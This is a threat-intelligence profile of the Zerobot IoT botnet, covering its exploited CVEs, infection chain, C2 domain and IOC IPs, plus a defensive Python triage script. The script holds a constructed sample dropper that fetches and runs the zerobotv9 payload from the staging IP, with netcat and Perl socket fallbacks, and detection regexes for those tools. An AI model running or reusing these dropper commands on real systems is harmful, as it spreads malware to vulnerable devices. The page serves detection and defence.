Zerobot
Zerobot is a Mirai-based IoT botnet/malware family first documented in 2022; a ninth known iteration, "zerobotv9", resurfaced in 2026. Earlier reporting described Zerobot as Go-based and IoT-focused, whereas zerobotv9 is smaller, is not written in Go, is UPX-packed, and uses encrypted strings. The family propagates by exploiting internet-exposed devices and platforms, including Hikvision devices via CVE-2021-36260, Tenda AC1206 routers via CVE-2025-7544, and the n8n workflow automation platform via CVE-2025-68613. Zerobot has also been mentioned alongside newer Mirai forks that added Windows infection capability, but no Windows functionality is established for Zerobot itself in the sources tracked here.
In the 2026 activity, Akamai SIRT observed Zerobot exploiting CVE-2025-68613 and CVE-2025-7544; the activity was first detected in January 2026 and dates back to at least early December 2025. After exploitation, the victim is instructed to download and execute a shell script named tol.sh from 144.172.100.228. The script copies BusyBox to /tmp, sets execute permissions, and then downloads and runs the main multi-architecture payload, zerobotv9. The malware hard-codes the C2 domain 0bot.qzz[.]io and uses browser-like user-agent strings so that its traffic blends in with legitimate web activity. For connectivity it also falls back to netcat, socat, and Perl socket methods when its primary method is unavailable.
Capabilities described for the family include Mirai-style botnet behaviour and multiple attack modules, named TCPXmas, Mixamp, SSH, and Discord. Zerobot is characterized as a Mirai-based campaign targeting exposed networks and connected devices, especially IoT infrastructure such as routers and cameras. It has also been observed targeting older, widely exploited web-application vulnerabilities as additional propagation paths: CVE-2017-9841 (PHPUnit eval-stdin.php remote code execution), CVE-2021-3129 (Laravel Ignition remote code execution), and CVE-2022-22947 (Spring Cloud Gateway SpEL injection). All three sit on application servers rather than embedded devices, which is consistent with the shift toward enterprise-adjacent targets such as n8n.
Associated infrastructure and indicators include the C2 domain 0bot.qzz[.]io, the staging IP 144.172.100.228 hosting tol.sh, and four additional malicious IPs recommended for blocking or monitoring: 103.59.160.237, 140.233.190.96, 172.86.123.179, and 216.126.227.101. Zerobot is also explicitly associated with exploitation of CVE-2021-36260 and is mentioned alongside Moobot in that context. Akamai SIRT research is the source for the 2026 Zerobot activity.
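The script below is an added example, not Akamai's, Mallory's, or the malware's own code. It turns the infection chain described above (BusyBox copied to /tmp, chmod, fetch of zerobotv9 from 144.172.100.228, netcat/socat/Perl fallbacks, browser-like user agents, hard-coded C2 0bot.qzz[.]io) and the IP list from the indicators section into a small triage check: one function scans a captured dropper for the staging steps and fallback methods, the other scans proxy and DNS log lines for the IOCs and for the one thing a browser-like user agent cannot hide, namely a camera or router presenting a desktop-browser UA. The sample dropper, log lines, asset inventory, key=value log format, and URL path are all constructed for illustration; the regexes are our own and are not vendor detection rules.

```python
import re
from typing import NamedTuple

# Indicators taken from the reporting summarised on this page.
STAGING_IP = "144.172.100.228"                     # hosts tol.sh
C2_DOMAIN = "0bot.qzz.io"                          # defanged as 0bot.qzz[.]io above
BLOCKLIST_IPS = {STAGING_IP, "103.59.160.237", "140.233.190.96",
                 "172.86.123.179", "216.126.227.101"}
ARTIFACTS = ("tol.sh", "zerobotv9")

# Our own regexes for the behaviours the report describes; illustrative,
# not vendor or Akamai detection rules.
BEHAVIOUR = {
    "busybox staged in /tmp": re.compile(r"\b(?:cp|mv)\b.*busybox.*/tmp/", re.I),
    "chmod +x on /tmp payload": re.compile(r"\bchmod\b\s+(?:\+x|[0-7]*7[0-7]*)\s+/tmp/\S+"),
    "netcat fallback": re.compile(r"\b(?:nc|ncat|netcat)\b.*\b\d{1,3}(?:\.\d{1,3}){3}\b"),
    "socat fallback": re.compile(r"\bsocat\b.*\bTCP4?:"),
    "perl socket fallback": re.compile(r"\bperl\b.*(?:IO::Socket|use\s+Socket)"),
}
# A desktop-browser User-Agent: harmless from a workstation, suspicious from a camera.
DESKTOP_UA = re.compile(r"Mozilla/5\.0 \((?:Windows NT|Macintosh|X11)")
LOG_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')   # assumed key=value log format


class Finding(NamedTuple):
    where: str       # "dropper:<line>" or "log:<line>"
    reason: str
    evidence: str


def ioc_hits(text: str) -> list[str]:
    """Return the page's IOCs present in text, accepting defanged [.] notation."""
    text = text.replace("[.]", ".")
    hits = [f"ip:{ip}" for ip in sorted(BLOCKLIST_IPS) if ip in text]
    if C2_DOMAIN in text:
        hits.append(f"domain:{C2_DOMAIN}")
    hits += [f"artifact:{a}" for a in ARTIFACTS if a in text]
    return hits


def scan_dropper(script: str) -> list[Finding]:
    """Flag IOCs plus staging and fallback behaviour in a captured shell dropper."""
    findings = []
    for n, line in enumerate(script.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        findings += [Finding(f"dropper:{n}", hit, line) for hit in ioc_hits(line)]
        findings += [Finding(f"dropper:{n}", reason, line)
                     for reason, rx in BEHAVIOUR.items() if rx.search(line)]
    return findings


def scan_logs(lines: list[str], iot_assets: set[str]) -> list[Finding]:
    """Flag IOC matches, and desktop-browser UAs presented by known IoT assets."""
    findings = []
    for n, raw in enumerate(lines, 1):
        kv = {k: v.strip('"') for k, v in LOG_KV.findall(raw)}
        findings += [Finding(f"log:{n}", hit, raw) for hit in ioc_hits(raw)]
        if kv.get("src") in iot_assets and DESKTOP_UA.search(kv.get("ua", "")):
            findings.append(Finding(f"log:{n}", "desktop UA from IoT asset", kv["ua"]))
    return findings


# Constructed sample dropper, modelled on the steps the report describes.
# The URL path and exact commands are assumptions for illustration.
SAMPLE_DROPPER = r"""#!/bin/sh
cp /bin/busybox /tmp/bb
chmod +x /tmp/bb
/tmp/bb wget http://144.172.100.228/zerobotv9 -O /tmp/zerobotv9 || \
  nc 144.172.100.228 80 < /tmp/req > /tmp/zerobotv9 || \
  perl -e 'use IO::Socket::INET; my $s = IO::Socket::INET->new(PeerAddr => q(144.172.100.228:80))'
chmod 777 /tmp/zerobotv9
/tmp/zerobotv9
"""

# Constructed asset inventory and proxy/DNS log lines (RFC 5737 addresses for benign hosts).
IOT_ASSETS = {"10.0.5.23", "10.0.5.24"}
SAMPLE_LOGS = [
    'ts=2026-01-14T03:12:09Z src=10.0.5.23 dst=144.172.100.228 method=GET '
    'url=http://144.172.100.228/tol.sh ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" status=200',
    'ts=2026-01-14T03:12:11Z src=10.0.5.23 type=dns query=0bot.qzz.io rcode=NOERROR',
    'ts=2026-01-14T03:13:40Z src=10.0.5.24 dst=203.0.113.10 method=GET url=http://example.com/fw.bin ua="Wget/1.21.3" status=200',
    'ts=2026-01-14T03:14:02Z src=10.0.9.8 dst=198.51.100.7 method=GET url=https://example.org/ ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0" status=200',
]

if __name__ == "__main__":
    for f in scan_dropper(SAMPLE_DROPPER) + scan_logs(SAMPLE_LOGS, IOT_ASSETS):
        print(f"{f.where:12} {f.reason:28} {f.evidence[:70]}")
```

The asset-aware check is the part worth keeping: the IOC list will age as the actor rotates infrastructure, whereas a router or camera that suddenly claims to be Chrome on Windows stays anomalous regardless of which IP it is talking to. The dropper regexes are deliberately loose (any `cp`/`mv` of BusyBox into /tmp, any `chmod` of a /tmp path) so they survive trivial renaming of tol.sh and zerobotv9.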
Vulnerabilities exploited
6 CVEs correlated with this family across public research and vendor advisories.
The botnet is likely using CVE-2021-36260 to infect these targets... VulnCheck tracks 23 public exploits for this vulnerability, including a Metasploit module... included in CISA’s Known Exploited Vulnerabilities Catalog (KEV)... actively detected in the Shadow Server and GreyNoise honeypot networks.
Zerobot Exploits Flaws in n8n and Tenda Routers — ... exploiting vulnerabilities in the n8n AI automation platform (CVE-2025-68613) and Tenda routers (CVE-2025-7544) to expand its reach.
The botnet was further observed targeting CVE-2017-9841, CVE-2021-3129, and CVE-2022-22947, using fallback connection techniques including netcat, socat, and Perl socket methods.
Techniques & procedures
3 distinct techniques documented for this family, organized by ATT&CK tactic; the two tactics enumerated on this page account for one technique each.
Initial Access: 1 technique
Execution: 1 technique
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups, plus other indicator types observed in public reporting; the C2 domain, staging IP, and additional IPs are listed in the summary above.
Recent activity
8 sources tracked across advisories, community write-ups, and news.
Referenced in a report alongside newer Mirai forks that added Windows infection capability; no Windows capability is attributed to Zerobot itself.
Mirai-derived botnet malware targeting IoT devices and exposed services (notably Tenda AC1206 routers and n8n). It spreads via exploitation of RCE flaws, drops a shell script (tol.sh) to fetch and execute the main multi-architecture payload (zerobotv9), and provides DDoS-style attack capabilities (e.g., TCPXmas, Mixamp) plus additional methods (SSH, Discord).
Mirai-based botnet exploiting vulnerabilities in both traditional IoT (routers) and enterprise-adjacent automation platforms (n8n) to expand infections; may increase organizational risk by enabling compromise of more critical infrastructure.
Mirai-based IoT botnet that propagates by exploiting vulnerabilities (including in n8n and Tenda routers) to compromise devices and expand the botnet footprint.